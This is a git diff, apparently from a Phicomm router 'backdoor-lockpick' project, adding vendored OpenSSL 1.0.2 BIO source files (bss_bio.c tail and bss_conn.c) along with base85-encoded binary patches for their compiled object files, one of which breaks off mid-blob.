+    return BIO_ctrl(bio, BIO_C_GET_READ_REQUEST, 0, NULL);
+}
+
+int BIO_ctrl_reset_read_request(BIO *bio)
+{
+    return (BIO_ctrl(bio, BIO_C_RESET_READ_REQUEST, 0, NULL) != 0);
+}
+
+/*
+ * BIO_nread0/nread/nwrite0/nwrite are available only for BIO pairs for now
+ * (conceivably some other BIOs could allow non-copying reads and writes
+ * too.)
+ */
+int BIO_nread0(BIO *bio, char **buf)
+{
+    long ret;
+
+    if (!bio->init) {
+        BIOerr(BIO_F_BIO_NREAD0, BIO_R_UNINITIALIZED);
+        return -2;
+    }
+
+    ret = BIO_ctrl(bio, BIO_C_NREAD0, 0, buf);
+    if (ret > INT_MAX)
+        return INT_MAX;
+    else
+        return (int)ret;
+}
+
+int BIO_nread(BIO *bio, char **buf, int num)
+{
+    int ret;
+
+    if (!bio->init) {
+        BIOerr(BIO_F_BIO_NREAD, BIO_R_UNINITIALIZED);
+        return -2;
+    }
+
+    ret = (int)BIO_ctrl(bio, BIO_C_NREAD, num, buf);
+    if (ret > 0)
+        bio->num_read += ret;
+    return ret;
+}
+
+int BIO_nwrite0(BIO *bio, char **buf)
+{
+    long ret;
+
+    if (!bio->init) {
+        BIOerr(BIO_F_BIO_NWRITE0, BIO_R_UNINITIALIZED);
+        return -2;
+    }
+
+    ret = BIO_ctrl(bio, BIO_C_NWRITE0, 0, buf);
+    if (ret > INT_MAX)
+        return INT_MAX;
+    else
+        return (int)ret;
+}
+
+int BIO_nwrite(BIO *bio, char **buf, int num)
+{
+    int ret;
+
+    if (!bio->init) {
+        BIOerr(BIO_F_BIO_NWRITE, BIO_R_UNINITIALIZED);
+        return -2;
+    }
+
+    ret = BIO_ctrl(bio, BIO_C_NWRITE, num, buf);
+    if (ret > 0)
+        bio->num_write += ret;
+    return ret;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_bio.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_bio.o
new file mode 100644
index 0000000000000000000000000000000000000000..eed875f93d7470153168f97b96454e1b921b1b51
GIT binary patch
literal 8472
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
T_b%7}BK~QCgx^8z$=Uy305no5

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_conn.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_conn.c
new file mode 100644
index 0000000..42d0aff
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_conn.c
@@ -0,0 +1,603 @@
+/* crypto/bio/bss_conn.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <errno.h>
+#define USE_SOCKETS
+#include "cryptlib.h"
+#include <openssl/bio.h>
+
+#ifndef OPENSSL_NO_SOCK
+
+# ifdef OPENSSL_SYS_WIN16
+#  define SOCKET_PROTOCOL 0     /* more microsoft stupidity */
+# else
+#  define SOCKET_PROTOCOL IPPROTO_TCP
+# endif
+
+# if (defined(OPENSSL_SYS_VMS) && __VMS_VER < 70000000)
+/* FIONBIO used as a switch to enable ioctl, and that isn't in VMS < 7.0 */
+#  undef FIONBIO
+# endif
+
+typedef struct bio_connect_st {
+    int state;
+    char *param_hostname;
+    char *param_port;
+    int nbio;
+    unsigned char ip[4];
+    unsigned short port;
+    struct sockaddr_in them;
+    /*
+     * int socket; this will be kept in bio->num so that it is compatible
+     * with the bss_sock bio
+     */
+    /*
+     * called when the connection is initially made callback(BIO,state,ret);
+     * The callback should return 'ret'.  state is for compatibility with the
+     * ssl info_callback
+     */
+    int (*info_callback) (const BIO *bio, int state, int ret);
+} BIO_CONNECT;
+
+static int conn_write(BIO *h, const char *buf, int num);
+static int conn_read(BIO *h, char *buf, int size);
+static int conn_puts(BIO *h, const char *str);
+static long conn_ctrl(BIO *h, int cmd, long arg1, void *arg2);
+static int conn_new(BIO *h);
+static int conn_free(BIO *data);
+static long conn_callback_ctrl(BIO *h, int cmd, bio_info_cb *);
+
+static int conn_state(BIO *b, BIO_CONNECT *c);
+static void conn_close_socket(BIO *data);
+BIO_CONNECT *BIO_CONNECT_new(void);
+void BIO_CONNECT_free(BIO_CONNECT *a);
+
+static BIO_METHOD methods_connectp = {
+    BIO_TYPE_CONNECT,
+    "socket connect",
+    conn_write,
+    conn_read,
+    conn_puts,
+    NULL,                       /* connect_gets, */
+    conn_ctrl,
+    conn_new,
+    conn_free,
+    conn_callback_ctrl,
+};
+
+static int conn_state(BIO *b, BIO_CONNECT *c)
+{
+    int ret = -1, i;
+    unsigned long l;
+    char *p, *q;
+    int (*cb) (const BIO *, int, int) = NULL;
+
+    if (c->info_callback != NULL)
+        cb = c->info_callback;
+
+    for (;;) {
+        switch (c->state) {
+        case BIO_CONN_S_BEFORE:
+            p = c->param_hostname;
+            if (p == NULL) {
+                BIOerr(BIO_F_CONN_STATE, BIO_R_NO_HOSTNAME_SPECIFIED);
+                goto exit_loop;
+            }
+            for (; *p != '\0'; p++) {
+                if ((*p == ':') || (*p == '/'))
+                    break;
+            }
+
+            i = *p;
+            if ((i == ':') || (i == '/')) {
+
+                *(p++) = '\0';
+                if (i == ':') {
+                    for (q = p; *q; q++)
+                        if (*q == '/') {
+                            *q = '\0';
+                            break;
+                        }
+                    if (c->param_port != NULL)
+                        OPENSSL_free(c->param_port);
+                    c->param_port = BUF_strdup(p);
+                }
+            }
+
+            if (c->param_port == NULL) {
+                BIOerr(BIO_F_CONN_STATE, BIO_R_NO_PORT_SPECIFIED);
+                ERR_add_error_data(2, "host=", c->param_hostname);
+                goto exit_loop;
+            }
+            c->state = BIO_CONN_S_GET_IP;
+            break;
+
+        case BIO_CONN_S_GET_IP:
+            if (BIO_get_host_ip(c->param_hostname, &(c->ip[0])) <= 0)
+                goto exit_loop;
+            c->state = BIO_CONN_S_GET_PORT;
+            break;
+
+        case BIO_CONN_S_GET_PORT:
+            if (c->param_port == NULL) {
+                /* abort(); */
+                goto exit_loop;
+            } else if (BIO_get_port(c->param_port, &c->port) <= 0)
+                goto exit_loop;
+            c->state = BIO_CONN_S_CREATE_SOCKET;
+            break;
+
+        case BIO_CONN_S_CREATE_SOCKET:
+            /* now setup address */
+            memset((char *)&c->them, 0, sizeof(c->them));
+            c->them.sin_family = AF_INET;
+            c->them.sin_port = htons((unsigned short)c->port);
+            l = (unsigned long)
+                ((unsigned long)c->ip[0] << 24L) |
+                ((unsigned long)c->ip[1] << 16L) |
+                ((unsigned long)c->ip[2] << 8L) | ((unsigned long)c->ip[3]);
+            c->them.sin_addr.s_addr = htonl(l);
+            c->state = BIO_CONN_S_CREATE_SOCKET;
+
+            ret = socket(AF_INET, SOCK_STREAM, SOCKET_PROTOCOL);
+            if (ret == INVALID_SOCKET) {
+                SYSerr(SYS_F_SOCKET, get_last_socket_error());
+                ERR_add_error_data(4, "host=", c->param_hostname,
+                                   ":", c->param_port);
+                BIOerr(BIO_F_CONN_STATE, BIO_R_UNABLE_TO_CREATE_SOCKET);
+                goto exit_loop;
+            }
+            b->num = ret;
+            c->state = BIO_CONN_S_NBIO;
+            break;
+
+        case BIO_CONN_S_NBIO:
+            if (c->nbio) {
+                if (!BIO_socket_nbio(b->num, 1)) {
+                    BIOerr(BIO_F_CONN_STATE, BIO_R_ERROR_SETTING_NBIO);
+                    ERR_add_error_data(4, "host=",
+                                       c->param_hostname, ":", c->param_port);
+                    goto exit_loop;
+                }
+            }
+            c->state = BIO_CONN_S_CONNECT;
+
+# if defined(SO_KEEPALIVE) && !defined(OPENSSL_SYS_MPE)
+            i = 1;
+            i = setsockopt(b->num, SOL_SOCKET, SO_KEEPALIVE, (char *)&i,
+                           sizeof(i));
+            if (i < 0) {
+                SYSerr(SYS_F_SOCKET, get_last_socket_error());
+                ERR_add_error_data(4, "host=", c->param_hostname,
+                                   ":", c->param_port);
+                BIOerr(BIO_F_CONN_STATE, BIO_R_KEEPALIVE);
+                goto exit_loop;
+            }
+# endif
+            break;
+
+        case BIO_CONN_S_CONNECT:
+            BIO_clear_retry_flags(b);
+            ret = connect(b->num,
+                          (struct sockaddr *)&c->them, sizeof(c->them));
+            b->retry_reason = 0;
+            if (ret < 0) {
+                if (BIO_sock_should_retry(ret)) {
+                    BIO_set_retry_special(b);
+                    c->state = BIO_CONN_S_BLOCKED_CONNECT;
+                    b->retry_reason = BIO_RR_CONNECT;
+                } else {
+                    SYSerr(SYS_F_CONNECT, get_last_socket_error());
+                    ERR_add_error_data(4, "host=",
+                                       c->param_hostname, ":", c->param_port);
+                    BIOerr(BIO_F_CONN_STATE, BIO_R_CONNECT_ERROR);
+                }
+                goto exit_loop;
+            } else
+                c->state = BIO_CONN_S_OK;
+            break;
+
+        case BIO_CONN_S_BLOCKED_CONNECT:
+            i = BIO_sock_error(b->num);
+            if (i) {
+                BIO_clear_retry_flags(b);
+                SYSerr(SYS_F_CONNECT, i);
+                ERR_add_error_data(4, "host=",
+                                   c->param_hostname, ":", c->param_port);
+                BIOerr(BIO_F_CONN_STATE, BIO_R_NBIO_CONNECT_ERROR);
+                ret = 0;
+                goto exit_loop;
+            } else
+                c->state = BIO_CONN_S_OK;
+            break;
+
+        case BIO_CONN_S_OK:
+            ret = 1;
+            goto exit_loop;
+        default:
+            /* abort(); */
+            goto exit_loop;
+        }
+
+        if (cb != NULL) {
+            if (!(ret = cb((BIO *)b, c->state, ret)))
+                goto end;
+        }
+    }
+
+    /* Loop does not exit */
+ exit_loop:
+    if (cb != NULL)
+        ret = cb((BIO *)b, c->state, ret);
+ end:
+    return (ret);
+}
+
+BIO_CONNECT *BIO_CONNECT_new(void)
+{
+    BIO_CONNECT *ret;
+
+    if ((ret = (BIO_CONNECT *)OPENSSL_malloc(sizeof(BIO_CONNECT))) == NULL)
+        return (NULL);
+    ret->state = BIO_CONN_S_BEFORE;
+    ret->param_hostname = NULL;
+    ret->param_port = NULL;
+    ret->info_callback = NULL;
+    ret->nbio = 0;
+    ret->ip[0] = 0;
+    ret->ip[1] = 0;
+    ret->ip[2] = 0;
+    ret->ip[3] = 0;
+    ret->port = 0;
+    memset((char *)&ret->them, 0, sizeof(ret->them));
+    return (ret);
+}
+
+void BIO_CONNECT_free(BIO_CONNECT *a)
+{
+    if (a == NULL)
+        return;
+
+    if (a->param_hostname != NULL)
+        OPENSSL_free(a->param_hostname);
+    if (a->param_port != NULL)
+        OPENSSL_free(a->param_port);
+    OPENSSL_free(a);
+}
+
+BIO_METHOD *BIO_s_connect(void)
+{
+    return (&methods_connectp);
+}
+
+static int conn_new(BIO *bi)
+{
+    bi->init = 0;
+    bi->num = INVALID_SOCKET;
+    bi->flags = 0;
+    if ((bi->ptr = (char *)BIO_CONNECT_new()) == NULL)
+        return (0);
+    else
+        return (1);
+}
+
+static void conn_close_socket(BIO *bio)
+{
+    BIO_CONNECT *c;
+
+    c = (BIO_CONNECT *)bio->ptr;
+    if (bio->num != INVALID_SOCKET) {
+        /* Only do a shutdown if things were established */
+        if (c->state == BIO_CONN_S_OK)
+            shutdown(bio->num, 2);
+        closesocket(bio->num);
+        bio->num = INVALID_SOCKET;
+    }
+}
+
+static int conn_free(BIO *a)
+{
+    BIO_CONNECT *data;
+
+    if (a == NULL)
+        return (0);
+    data = (BIO_CONNECT *)a->ptr;
+
+    if (a->shutdown) {
+        conn_close_socket(a);
+        BIO_CONNECT_free(data);
+        a->ptr = NULL;
+        a->flags = 0;
+        a->init = 0;
+    }
+    return (1);
+}
+
+static int conn_read(BIO *b, char *out, int outl)
+{
+    int ret = 0;
+    BIO_CONNECT *data;
+
+    data = (BIO_CONNECT *)b->ptr;
+    if (data->state != BIO_CONN_S_OK) {
+        ret = conn_state(b, data);
+        if (ret <= 0)
+            return (ret);
+    }
+
+    if (out != NULL) {
+        clear_socket_error();
+        ret = readsocket(b->num, out, outl);
+        BIO_clear_retry_flags(b);
+        if (ret <= 0) {
+            if (BIO_sock_should_retry(ret))
+                BIO_set_retry_read(b);
+        }
+    }
+    return (ret);
+}
+
+static int conn_write(BIO *b, const char *in, int inl)
+{
+    int ret;
+    BIO_CONNECT *data;
+
+    data = (BIO_CONNECT *)b->ptr;
+    if (data->state != BIO_CONN_S_OK) {
+        ret = conn_state(b, data);
+        if (ret <= 0)
+            return (ret);
+    }
+
+    clear_socket_error();
+    ret = writesocket(b->num, in, inl);
+    BIO_clear_retry_flags(b);
+    if (ret <= 0) {
+        if (BIO_sock_should_retry(ret))
+            BIO_set_retry_write(b);
+    }
+    return (ret);
+}
+
+static long conn_ctrl(BIO *b, int cmd, long num, void *ptr)
+{
+    BIO *dbio;
+    int *ip;
+    const char **pptr;
+    long ret = 1;
+    BIO_CONNECT *data;
+
+    data = (BIO_CONNECT *)b->ptr;
+
+    switch (cmd) {
+    case BIO_CTRL_RESET:
+        ret = 0;
+        data->state = BIO_CONN_S_BEFORE;
+        conn_close_socket(b);
+        b->flags = 0;
+        break;
+    case BIO_C_DO_STATE_MACHINE:
+        /* use this one to start the connection */
+        if (data->state != BIO_CONN_S_OK)
+            ret = (long)conn_state(b, data);
+        else
+            ret = 1;
+        break;
+    case BIO_C_GET_CONNECT:
+        if (ptr != NULL) {
+            pptr = (const char **)ptr;
+            if (num == 0) {
+                *pptr = data->param_hostname;
+
+            } else if (num == 1) {
+                *pptr = data->param_port;
+            } else if (num == 2) {
+                *pptr = (char *)&(data->ip[0]);
+            } else if (num == 3) {
+                *((int *)ptr) = data->port;
+            }
+            if ((!b->init) || (ptr == NULL))
+                *pptr = "not initialized";
+            ret = 1;
+        }
+        break;
+    case BIO_C_SET_CONNECT:
+        if (ptr != NULL) {
+            b->init = 1;
+            if (num == 0) {
+                if (data->param_hostname != NULL)
+                    OPENSSL_free(data->param_hostname);
+                data->param_hostname = BUF_strdup(ptr);
+            } else if (num == 1) {
+                if (data->param_port != NULL)
+                    OPENSSL_free(data->param_port);
+                data->param_port = BUF_strdup(ptr);
+            } else if (num == 2) {
+                char buf[16];
+                unsigned char *p = ptr;
+
+                BIO_snprintf(buf, sizeof buf, "%d.%d.%d.%d",
+                             p[0], p[1], p[2], p[3]);
+                if (data->param_hostname != NULL)
+                    OPENSSL_free(data->param_hostname);
+                data->param_hostname = BUF_strdup(buf);
+                memcpy(&(data->ip[0]), ptr, 4);
+            } else if (num == 3) {
+                char buf[DECIMAL_SIZE(int) + 1];
+
+                BIO_snprintf(buf, sizeof buf, "%d", *(int *)ptr);
+                if (data->param_port != NULL)
+                    OPENSSL_free(data->param_port);
+                data->param_port = BUF_strdup(buf);
+                data->port = *(int *)ptr;
+            }
+        }
+        break;
+    case BIO_C_SET_NBIO:
+        data->nbio = (int)num;
+        break;
+    case BIO_C_GET_FD:
+        if (b->init) {
+            ip = (int *)ptr;
+            if (ip != NULL)
+                *ip = b->num;
+            ret = b->num;
+        } else
+            ret = -1;
+        break;
+    case BIO_CTRL_GET_CLOSE:
+        ret = b->shutdown;
+        break;
+    case BIO_CTRL_SET_CLOSE:
+        b->shutdown = (int)num;
+        break;
+    case BIO_CTRL_PENDING:
+    case BIO_CTRL_WPENDING:
+        ret = 0;
+        break;
+    case BIO_CTRL_FLUSH:
+        break;
+    case BIO_CTRL_DUP:
+        {
+            dbio = (BIO *)ptr;
+            if (data->param_port)
+                BIO_set_conn_port(dbio, data->param_port);
+            if (data->param_hostname)
+                BIO_set_conn_hostname(dbio, data->param_hostname);
+            BIO_set_nbio(dbio, data->nbio);
+            /*
+             * FIXME: the cast of the function seems unlikely to be a good
+             * idea
+             */
+            (void)BIO_set_info_callback(dbio,
+                                        (bio_info_cb *)data->info_callback);
+        }
+        break;
+    case BIO_CTRL_SET_CALLBACK:
+        {
+# if 0                          /* FIXME: Should this be used? -- Richard
+                                 * Levitte */
+            BIOerr(BIO_F_CONN_CTRL, ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+            ret = -1;
+# else
+            ret = 0;
+# endif
+        }
+        break;
+    case BIO_CTRL_GET_CALLBACK:
+        {
+            int (**fptr) (const BIO *bio, int state, int xret);
+
+            fptr = (int (**)(const BIO *bio, int state, int xret))ptr;
+            *fptr = data->info_callback;
+        }
+        break;
+    default:
+        ret = 0;
+        break;
+    }
+    return (ret);
+}
+
+static long conn_callback_ctrl(BIO *b, int cmd, bio_info_cb *fp)
+{
+    long ret = 1;
+    BIO_CONNECT *data;
+
+    data = (BIO_CONNECT *)b->ptr;
+
+    switch (cmd) {
+    case BIO_CTRL_SET_CALLBACK:
+        {
+            data->info_callback =
+                (int (*)(const struct bio_st *, int, int))fp;
+        }
+        break;
+    default:
+        ret = 0;
+        break;
+    }
+    return (ret);
+}
+
+static int conn_puts(BIO *bp, const char *str)
+{
+    int n, ret;
+
+    n = strlen(str);
+    ret = conn_write(bp, str, n);
+    return (ret);
+}
+
+BIO *BIO_new_connect(const char *str)
+{
+    BIO *ret;
+
+    ret = BIO_new(BIO_s_connect());
+    if (ret == NULL)
+        return (NULL);
+    if (BIO_set_conn_hostname(ret, str))
+        return (ret);
+    else {
+        BIO_free(ret);
+        return (NULL);
+    }
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_conn.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_conn.o
new file mode 100644
index 0000000000000000000000000000000000000000..2f8ace8c3d34b577a4819b9685ec4e25978a6a55
GIT binary patch
literal 9984
zcmchc4QyN06@Z_A(x!jUZh<Wup>>NXE~Bp9QV3;09LLQ|ahv`m{PYLcb(|(^Vn_D#
z+LA&dUef8!O@}n5A#L3x(8icXh0xSiWlJsEVWPn{3Z0O~psKnpmOJQRKxs$3bMCv>
zIeEm|#-<&`@7?>|bI(2Z+@E*fOMfW5+G?>#LM+l<(nL;BNg7x*k*;USdTE|CSNgy)
z|FS=)jmw!iO18<T=<Dl_Vf~YV`vUidhgYI%pe@iE&|WFEDf*|I6#WB5yHFF(ChFRi
zto;TLC@6ZPyV{@2+Db2Lm!><uF=msb=9qnd*mCi%(pe=NtX76{nc9#)=N~=Z3l$2F
zLK_2@SE-JH%gfZ6N-5_UaSoo&T+mzHb`5xyc6nK*{v}D$_POn=GPj0@_gKRErEh`~
